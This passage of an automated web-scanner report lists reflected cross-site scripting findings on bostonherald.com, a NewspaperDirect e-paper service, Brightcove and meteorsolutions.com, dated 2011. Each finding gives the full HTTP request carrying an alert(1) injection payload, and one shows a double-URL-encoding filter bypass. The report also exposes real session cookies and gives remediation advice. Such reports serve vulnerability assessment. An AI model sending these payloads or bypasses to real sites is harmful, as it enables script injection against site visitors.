Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2082
Connection: close
<style type="text/css">
/* div { top: 0px; } */
</style>
<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottomb8eb5\"><script>alert(1)</script>ac50390d5f8!Top">
...[SNIP]...
|
4.85. http://bostonherald.com/includes/processAds.bg [companion parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bostonherald.com |
| Path: |
/includes/processAds.bg |
Issue detail
The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 492df</script><script>alert(1)</script>3d2d1682c3d was submitted in the companion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom492df</script><script>alert(1)</script>3d2d1682c3d&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2118
Connection: close
<style type="text/css">
/* div { top: 0px; } */
</style>
<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
R=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom492df</script><script>alert(1)</script>3d2d1682c3d!Top">
...[SNIP]...
|
4.86. http://bostonherald.com/includes/processAds.bg [page parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bostonherald.com |
| Path: |
/includes/processAds.bg |
Issue detail
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c1c0"><script>alert(1)</script>6c55ca82c3b was submitted in the page parameter. This input was echoed as 6c1c0\"><script>alert(1)</script>6c55ca82c3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle6c1c0"><script>alert(1)</script>6c55ca82c3b HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2082
Connection: close
<style type="text/css">
/* div { top: 0px; } */
</style>
<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article6c1c0\"><script>alert(1)</script>6c55ca82c3b@Top,Right,Middle,Bottom!Top">
...[SNIP]...
|
4.87. http://bostonherald.com/includes/processAds.bg [page parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bostonherald.com |
| Path: |
/includes/processAds.bg |
Issue detail
The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bca3%2527%253balert%25281%2529%252f%252f54aa045dd55 was submitted in the page parameter. This input was echoed as 8bca3';alert(1)//54aa045dd55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle8bca3%2527%253balert%25281%2529%252f%252f54aa045dd55 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1986
Connection: close
<style type="text/css">
/* div { top: 0px; } */
</style>
<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
CE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/regional/article8bca3';alert(1)//54aa045dd55@Top,Right,Middle,Bottom!Top">
...[SNIP]...
|
4.88. http://bostonherald.com/includes/processAds.bg [position parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bostonherald.com |
| Path: |
/includes/processAds.bg |
Issue detail
The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d9a4"><script>alert(1)</script>5a6cecf4080 was submitted in the position parameter. This input was echoed as 4d9a4\"><script>alert(1)</script>5a6cecf4080 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Top4d9a4"><script>alert(1)</script>5a6cecf4080&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2077
Connection: close
<style type="text/css">
/* div { top: 0px; } */
</style>
<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top4d9a4\"><script>alert(1)</script>5a6cecf4080">
...[SNIP]...
|
4.89. http://bostonherald.com/includes/processAds.bg [position parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bostonherald.com |
| Path: |
/includes/processAds.bg |
Issue detail
The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95ffc</script><script>alert(1)</script>2d13a9c6857 was submitted in the position parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/processAds.bg?position=Top95ffc</script><script>alert(1)</script>2d13a9c6857&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2113
Connection: close
<style type="text/css">
/* div { top: 0px; } */
</style>
<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top95ffc</script><script>alert(1)</script>2d13a9c6857">
...[SNIP]...
|
4.90. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bostonheraldnie.newspaperdirect.com |
| Path: |
/epaper/Services/HomePageHandler.ashx |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7b357<script>alert(1)</script>dcde2ff62ac was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /epaper/Services/HomePageHandler.ashx?host=bostonheraldnie.newspaperdirect.com&type=toppictures&datepos=7&language=en&count=20&personalization=0&format=json&callback=HomePageManager.Pictures.DataManager.onDataLoaded7b357<script>alert(1)</script>dcde2ff62ac&swf=true HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; homepage_settings_4=20_5_15_6_15_6_15_6_15_6_15_6_30_5_5_5_5_22_11_16_11_11_6_8_1_15_6; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.1.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/
|
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 17 Sep 2011 01:54:38 GMT
Last-Modified: Sat, 17 Sep 2011 01:44:38 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 1
Date: Sat, 17 Sep 2011 01:44:37 GMT
Content-Length: 5965
HomePageManager.Pictures.DataManager.onDataLoaded7b357<script>alert(1)</script>dcde2ff62ac([{id:"47a9b2b0-91be-400a-8f04-6330867a2c04",key:"2abXk7wkLUHesN7z0Gy4qg==",width:718,fpscale:10,type:"pic",article:{id:"e8459750-9218-41e4-8a6d-5bdc7aaad8fa",page:1,title:"HUMAN GUINEA PIGS",rank:4,po
...[SNIP]...
|
4.91. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bostonheraldnie.newspaperdirect.com |
| Path: |
/epaper/Services/HomePageHandler.ashx |
Issue detail
The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39203%3balert(1)//7c31c657ad7 was submitted in the callback parameter. This input was echoed as 39203;alert(1)//7c31c657ad7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /epaper/Services/HomePageHandler.ashx?host=bostonheraldnie.newspaperdirect.com&type=imgsrvs&callback=HomePageManager._onImgSrvsDataLoaded39203%3balert(1)//7c31c657ad7 HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.1.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/
|
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 24 Sep 2011 01:42:38 GMT
Last-Modified: Sat, 17 Sep 2011 01:42:38 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 2
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:42:38 GMT
Content-Length: 220
HomePageManager._onImgSrvsDataLoaded39203;alert(1)//7c31c657ad7(["http://cache2-thumb1.pressdisplay.com/pressdisplay/docserver/getimage.aspx","http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx"]) |
4.92. http://bostonheraldnie.newspaperdirect.com/epaper/check.session [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bostonheraldnie.newspaperdirect.com |
| Path: |
/epaper/check.session |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5a4d3<script>alert(1)</script>798bcc7a568 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /epaper/check.session?callback=check_session_callback5a4d3<script>alert(1)</script>798bcc7a568&t=1316239605342 HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/viewer.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; homepage_settings_4=20_5_15_6_15_6_15_6_15_6_15_6_30_5_5_5_5_22_11_16_11_11_6_8_1_15_6; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.9.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/
|
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 4
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:45:23 GMT
Content-Length: 88
check_session_callback5a4d3<script>alert(1)</script>798bcc7a568({interval:0,timeout:0}); |
4.93. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://c.brightcove.com |
| Path: |
/services/messagebroker/amf |
Issue detail
The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload e4004<script>alert(1)</script>f95237046cf was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /services/messagebroker/amf?playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
Content-Length: 554
Origin: http://bostonherald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1..... ...Qfa49d8dcd1acf958feddf0bf286c3afd013add68
cccom.brightcove.experience.ViewerExperienceRequest.experienceId.de
...[SNIP]...
|
Response
HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:33:17 GMT
Server:
Content-Length: 5105
......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
3.l.Y...eAQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9. ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId type.mediaDTO
.Bp.........ivideoPlayere4004<script>alert(1)</script>f95237046cf.........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...
|
4.94. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://cdnt.meteorsolutions.com |
| Path: |
/api/ie8_email |
Issue detail
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ccca6<script>alert(1)</script>b631027d26d was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/ie8_email?url=httpG3AG2FG2FattuverseoffersG2EcomG2FtvG5FhsiG5FbundlesG2FindexG2EphpG3FsendVarG3D20StateG5F49PromoOfferG26sourceG3DECbc0000000WIP00OG26fbidG3D9Lm6uVSxVG5FuG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1ccca6<script>alert(1)</script>b631027d26d&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; uid=c5699614-96b6-4b6d-81ac-02170daae0a6
|
Response
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:40:49 GMT
Etag: "a4b5740c82ba57098d3f47fe0f640d85a84fd058"
Server: nginx/0.7.65
Content-Length: 180
Connection: keep-alive
meteor.json_query_callback({"url": "http://meme.ms/cuip47", "id": "1ccca6<script>alert(1)</script>b631027d26d", "persist": "http://meme.ms/persist?key=P3lDVrJa3rexwrmXrfPlFA"}, 1); |
4.95. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://cdnt.meteorsolutions.com |
| Path: |
/api/ie8_email |
Issue detail
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 16faf<script>alert(1)</script>25da9310260 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/ie8_email?url=httpG3AG2FG2FattuverseoffersG2EcomG2FtvG5FhsiG5FbundlesG2FindexG2EphpG3FsendVarG3D20StateG5F49PromoOfferG26sourceG3DECbc0000000WIP00OG26fbidG3D9Lm6uVSxVG5FuG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3B16faf<script>alert(1)</script>25da9310260 HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; uid=c5699614-96b6-4b6d-81ac-02170daae0a6
|
Response
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:41:29 GMT
Etag: "2f474720da0453874e528615d87c85b45464f2e0"
Server: nginx/0.7.65
Content-Length: 180
Connection: keep-alive
meteor.json_query_callback({"url": "http://meme.ms/cuip47", "id": "1", "persist": "http://meme.ms/persist?key=P3lDVrJa3rexwrmXrfPlFA"}, 1);16faf<script>alert(1)</script>25da9310260 |
4.96. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://cdnt.meteorsolutions.com |
| Path: |
/api/track |
Issue detail
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 9af12<script>alert(1)</script>c3b46f05e43 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/track?application_id=ee612e29-9b27-4ec8-bbf8-759478dd3755&url_fbid=9Lm6uVSxV_u&parent_fbid=&referrer=http%3A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%3FclickData%3DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%3Dhttp%3A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%3Bwi.728%3Bhi.90%3Bai.236941493%3Bct.1%2F01&location=http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B9af12<script>alert(1)</script>c3b46f05e43 HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
